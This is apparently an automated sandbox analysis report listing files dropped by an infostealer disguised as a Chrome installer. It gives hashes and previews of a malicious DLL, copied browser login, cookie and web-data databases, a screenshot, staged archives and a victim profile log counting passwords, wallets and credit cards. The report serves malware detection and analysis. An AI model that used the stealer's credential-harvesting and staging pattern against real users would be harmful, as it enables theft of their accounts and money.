                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\MSI43F8.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):602432
                                                                                                      Entropy (8bit):6.469389454249605
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                                                                      MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                                                                      SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                                                                      SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                                                                      SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\ProD9.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):42
                                                                                                      Entropy (8bit):3.833175911936759
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:tUCEiUUCQOcPn:1E3/cP
                                                                                                      MD5:CA13FAE88660950BD417520AA2BB0CEE
                                                                                                      SHA1:98746236122D8A68B2AD45E2489095EC759A9156
                                                                                                      SHA-256:50037BC7797B299FAEA93788112A3417D4C3EA6431BE498840A9D0781C4EF764
                                                                                                      SHA-512:A862AE187A6D8E137BBF26813FC30B4C228C1718A031B6B426F6DAB203B17A2290587E32219D8D8DBF976466A33D10625C54B31862919B92585E216236269CF4
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:99B141418A0613610FFB509A490F79F2C76C7D6B..

                                                                                                      C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\screen1.png

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):797577
                                                                                                      Entropy (8bit):7.644655619648841
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:8vO9ftVs26NJ0xhAdTo1XkQ5rMm0MrAdW8DeT08GK6Rdc8J6vlMjqXuAl2Fbu4ww:8vOG0Pz7rMYrTeC086ulyj4uQPI
                                                                                                      MD5:46B722A162D4A738B997F99D0FF18D14
                                                                                                      SHA1:1AD2BEB36EEDF8EB70C1EEBF252400251330D596
                                                                                                      SHA-256:E0624211F3B86DC011C42EB46A9EBE82C4FEC6408641D2696C90BC3D87A7DAF2
                                                                                                      SHA-512:F1705428AF21E6E3F951AE19C7CCDE8FD7C684E706B7DED7464185E5563FF63597AF7616F94C365E45820300B2CFFE02EAC3405908548473CD37A5AFB2772803
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR................C..+PIDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L.8.RF...$.$qE....$...e!........./...`...\f..N.....~.~.~.y....x.6.g...2..)....R..9H@.".x.6.!$..y.6....J.V.BI..l.E..b#s.m.S. ..6/2..p6.H.{H..%2.....m....I<?....l. ........!..A$..*.0.y I<PH....6....$.5.(.s..K...@......H....O!...g...$q.....I\!q?I...,.?...........+.W.xN..k...l.E.....E.<?2.....e.."y.....eJ.%....I.2...(.W.y.."..s../..h....H..R.`..V.\..Ec.c%...$qE...._..Y..y.I<........$........$.Ml.$..a.?I<?.yQH.F.@.yn.x .H..._O.Yl............"xaL.@..Wq...dq..e......s.y.a....'.A._ds?q?.`..`sE..s..<..$...O....`..s...E"..l.S.<.'.V....J.Ef./.x....l....l.y.I....@.?J....l._K.H....$.g..I.........".wQ...I.B.6....l.o%....".....$...?...$.x~,.S....Y$q?I\.. .s...$....x.Tx.6/...C..=.._E.9...9.W.y.%H<...]...\f...2....Yl.'..)......$..l.o.._..Y.L....H...s. ..K....[.p.......<.../y...5.g1..._E.

                                                                                                      C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\sensfiles.zip

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20386
                                                                                                      Entropy (8bit):5.005121991814657
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:GVR7rjO7rjiixjCTPIoeoxJMZVR7rjO7rjiixjCTPIoeoxJMYO:CC6ixcvyC6ixcvhO
                                                                                                      MD5:6E6C6F7288DC04E3B2CEDAEDDD1B3565
                                                                                                      SHA1:3F2C32A7E4BF0034E868D21D2C4A369B24460F69
                                                                                                      SHA-256:EE0363565B689F526831661567A8D66DA461F83A3F9D1B698B6E49C6B4537D94
                                                                                                      SHA-512:5E6A53810A2033006B1D30F38370E75486ADE0AB09A7CDE97F86CD4E41D8E4C11C379425C32FE9CB2E52E813D8349BD5E9042A9F8B01ECD430C5F9F8D7BC6F51
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:PK........|.'W................AFWAAFRXKO.docxAFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXI

                                                                                                      C:\Users\user\AppData\Local\Temp\WcOe3Npy2E0hpNlCzG96m2TaRH9VoW\user_info.txt

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):599
                                                                                                      Entropy (8bit):5.321853717809852
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:eM31wQN3yyGs8/Q8Fxx6Y3ZCrJFbhlQM7NlViHBQM3aWfgyIHdAdRj01/kq:eoNNI/3xxV3qGM7NlV+e8dOAdRjU/kq
                                                                                                      MD5:942E48FE48A6B44160066D663C67183F
                                                                                                      SHA1:29F285E4B165B967965AE08FE364663A32B5B073
                                                                                                      SHA-256:DE9536684BFC27DFCCFD9576C2B6EC7488BC23028EF784C4460837798DA48E4C
                                                                                                      SHA-512:86AA446A2867FDE46E3932D8FE16C0BC0C212D606156CDD7EA1A19AEC96B2D17EE8EED2102269B96569B1E5FAA3E63E02B607DFE0B6F00588F7B7D3FC761A69C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:..- IP Info -....IP: 191.101.61.19..Country: United States..City: Las Vegas..Postal: 89101..ISP: Cogent Communications - A174..Timezone: -07:00....- PC Info -....OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - VLSU3BRF (1280, 1024)..HWID: 4573883483855036..Current Language: English (United States)..FileLocation: C:\Program Files\Google LLC\Google Chrome\setup.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: ....Wallets: ....Files: . 18...Credit Cards: ..

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bczlggro.djv.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldpczgii.ohh.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfumrsve.viq.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrofaplh.ayh.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4w3kyyz.iz0.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5yey5jy.bcn.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1

                                                                                                      C:\Users\user\AppData\Local\Temp\aicD7.pfx

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2598
                                                                                                      Entropy (8bit):7.809160934759085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:CylEgsB+bo9clW6CFBn3DQ5sz9AprTtcwL88pGJQFCHVnBfhFb6fccHFrAgq8ra:kFqWHB3D7RE/I6FQVBf/b6fFugq8ra
                                                                                                      MD5:AB62A1063FA831F6BBFA68876685F3C8
                                                                                                      SHA1:F32549D2E03AC7CD15DE769E1C3BC979C71CF78F
                                                                                                      SHA-256:1D125BBF7A9AC13EB1A12FBB06706791D29723B96724CE17ABCB1D2BB9B7BE4C
                                                                                                      SHA-512:11919FF40E27EDBB2DB95240EE99CA66F333A73BAE27E4DA768EA5B7C3A8B1C86E4F058AD017893119FC380A12FA5B771EC8A2821991F02FE9AE7B1CC33E8A28
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:0.."...0.....*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...'"j.Io...........:.\.......x:P0..n.....1.`.HC6..j...........w;ih.M.~3..L.DP....i?`2......~......s......t;.Y..M.p..t..U......t.`P.....X.....'!...(....T..eP.?.tqX.C.8..F...A.O.s.G.B ....t.u.L.gDyD.bT,...D...<.,..#..1.M......m.h...1~....!O.1}...3n.>0>4HCrF?{\..k.i<`.>rI"..?p>...DS..R.;...Ja..\...../..5.....l...t.....9....\.yR.8$.syN....z.......v...L.._O.?_d..q.!. .m.....Jp^3.t.Gt.p.#.ni.........|...4.dFP... .=..%.:...%..=Cq.S.$..z~...i.<.WU..4..\{n\...g...v'...MA.3J-....~...X..KI.bJvE=.P........ V.`..4....i.kz....:..l...`...?X^.QH.s...O..lF...Lt......vS..(..8q.&..J<M.R......k..i.!-i......P.1...W.l.M.}....S.6+ro..O......M...5T2.P..9......~`7.qOgir.Yq..9............O#V.m]x...L.q.U#oR..~...B..G.=..I.Y>?=.~-....@.O.&.OM..]]j./..]...8oR.]I4j....N.D..=.=0'.lY.p6.c.:..j.(.T..a......#.......-2..4.1.~.W..L.)n.E*......v.[/.....nP.1..@.Q.g.....{R

                                                                                                      C:\Users\user\AppData\Local\Temp\google_default_login_data

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49152
                                                                                                      Entropy (8bit):0.7876734657715041
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\google_default_webdata

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):94208
                                                                                                      Entropy (8bit):1.2889923589460437
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Qo1/8dpUXbSzTPJP/6oVuss8Ewn7PrH944:QS/inXrVuss8Ewn7b944
                                                                                                      MD5:7901DD9DF50A993306401B7360977746
                                                                                                      SHA1:E5BA33E47A3A76CC009EC1D63C5D1A810BE40521
                                                                                                      SHA-256:1019C8ADA4DA9DEF665F59DB191CA3A613F954C12813BE5907E1F5CB91C09BE9
                                                                                                      SHA-512:90C785D22D0D7F5DA90D52B14010719A5554BB5A7F0029C3F4E11A97AD72A7A600D846174C7B40D47D24B0995CDBAC21E255EC63AC9C07CF6E106572EA181DD5
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\google_network_cookies

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
                                                                                                      Category:dropped
                                                                                                      Size (bytes):28672
                                                                                                      Entropy (8bit):0.4393511334109407
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
                                                                                                      MD5:8C31C5487A97BBE73711C5E20600C1F6
                                                                                                      SHA1:D4D6B04226D8FFC894749B3963E7DB7068D6D773
                                                                                                      SHA-256:A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
                                                                                                      SHA-512:394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\out.zip

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                      Category:modified
                                                                                                      Size (bytes):819642
                                                                                                      Entropy (8bit):7.658144747748669
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:QvO9ftVs26NJ0xhAdTo1XkQ5rMm0MrAdW8DeT08GK6Rdc8J6vlMjqXuAl2Fbu4wT:QvOG0Pz7rMYrTeC086ulyj4uQPMQv
                                                                                                      MD5:7FAB8BB746C267EBD4629AFADDFE48BC
                                                                                                      SHA1:361171F17BBFDB6A768B3197063A5C2A69A7AD95
                                                                                                      SHA-256:F7ADE2C1370EB9B6B4FB4E214198D88DC3B402BE72D2027D6980896C21406839
                                                                                                      SHA-512:93C719F73E6384F792B7C1AF1A04371B6E37FEB3AB733CED59A5ACF45290BC452F79AD2B6E7C5B70B34E7DC34710EA2E5C5D7A4E40158F1D2FA2C0259B2CB505
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:PK........H.'W................Autofill/PK........H.'W................Cookies/PK........H.'W................Creditcards/PK........H.'W................Passwords/PK........H.'W&_...+...+......screen1.png.PNG........IHDR................C..+PIDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L.8.RF...$.$qE....$...e!........./...`...\f..N.....~.~.~.y....x.6.g...2..)....R..9H@.".x.6.!$..y.6....J.V.BI..l.E..b#s.m.S. ..6/2..p6.H.{H..%2.....m....I<?....l. ........!..A$..*.0.y I<PH....6....$.5.(.s..K...@......H....O!...g...$q.....I\!q?I...,.?...........+.W.xN..k...l.E.....E.<?2.....e.."y.....eJ.%....I.2...(.W.y.."..s../..h....H..R.`..V.\..Ec.c%...$qE...._..Y..y.I<........$........$.Ml.$..a.?I<?.yQH.F.@.yn.x .H..._O.Yl............"xaL.@..Wq...dq..e......s.y.a....'.A._ds?q?.`..`sE..s..<..$...O....`..s...E"..l.S.<.'.V....J.Ef./.x....l....l.y.I....@.?J....l._K.H....$.g..I.........

                                                                                                      C:\Users\user\AppData\Local\Temp\pssD8.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):898
                                                                                                      Entropy (8bit):3.4313874780038636
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:QEAlL2cFQClOYQv30Z4hDQgQLQASQ2O9y3Q2Flbxb1iluPAR8lilJaZZd4ar1Z5f:QZlrF9rQvFVALQPSCdxb1BoeilmrNJh
                                                                                                      MD5:EB6FC7B63CE9CF9689C18ACA85305B23
                                                                                                      SHA1:190D736EC39B3B4B3CD056CC10E608D0AEA2D8D6
                                                                                                      SHA-256:30325B0816270A0B44020FF86A2218DD15851FFA764674AFC7ACC40453198D2C
                                                                                                      SHA-512:25D1172C2482C4187C8EEAE8F0279005E4363483C8FBC04179B79AF7DD77A342F8B64AD9981A40B6EC413E4D3DAF6099737B61C64A9734E78A437F062AB50632
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.... . . . .P.a.r.a.m.(.$.m.a.n.u.f.a.c.t.u.r.e.r.,. .$.p.a.s.s.,. .$.p.f.x.P.a.t.h.)... . . . ... . . . .$.p.a.s.s.w.o.r.d. .=. .C.o.n.v.e.r.t.T.o.-.S.e.c.u.r.e.S.t.r.i.n.g. .$.p.a.s.s. .-.A.s.P.l.a.i.n.T.e.x.t. .-.F.o.r.c.e... . . . ... . . . .$.c.e.r.t.I.n.f.o. .=. .N.e.w.-.S.e.l.f.S.i.g.n.e.d.C.e.r.t.i.f.i.c.a.t.e. .-.T.y.p.e. .C.u.s.t.o.m. .-.S.u.b.j.e.c.t. .$.m.a.n.u.f.a.c.t.u.r.e.r. .-.F.r.i.e.n.d.l.y.N.a.m.e. .$.m.a.n.u.f.a.c.t.u.r.e.r. .-.H.a.s.h.A.l.g.o.r.i.t.h.m. .s.h.a.2.5.6. .-.C.e.r.t.S.t.o.r.e.L.o.c.a.t.i.o.n. .".c.e.r.t.:.\.\.c.u.r.r.e.n.t.u.s.e.r.\.m.y."... . . . .$.c.e.r.t.I.n.f.o. .|. .E.x.p.o.r.t.-.P.f.x.C.e.r.t.i.f.i.c.a.t.e. .-.F.i.l.e.P.a.t.h. .$.p.f.x.P.a.t.h. .-.P.a.s.s.w.o.r.d. .$.p.a.s.s.w.o.r.d. .|. .O.u.t.-.N.u.l.l... . . . .$.c.e.r.t.I.n.f.o...T.h.u.m.b.p.r.i.n.t. . . . ..... . . . .R.e.m.o.v.e.-.I.t.e.m. .-.P.a.t.h. .$.c.e.r.t.I.n.f.o...P.S.P.a.t.h... . .

                                                                                                      C:\Users\user\AppData\Local\Temp\sensfiles.zip

                                                                                                      Download File
                                                                                                      Process:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20386
                                                                                                      Entropy (8bit):5.005121991814657
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:GVR7rjO7rjiixjCTPIoeoxJMZVR7rjO7rjiixjCTPIoeoxJMYO:CC6ixcvyC6ixcvhO
                                                                                                      MD5:6E6C6F7288DC04E3B2CEDAEDDD1B3565
                                                                                                      SHA1:3F2C32A7E4BF0034E868D21D2C4A369B24460F69
                                                                                                      SHA-256:EE0363565B689F526831661567A8D66DA461F83A3F9D1B698B6E49C6B4537D94
                                                                                                      SHA-512:5E6A53810A2033006B1D30F38370E75486ADE0AB09A7CDE97F86CD4E41D8E4C11C379425C32FE9CB2E52E813D8349BD5E9042A9F8B01ECD430C5F9F8D7BC6F51
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
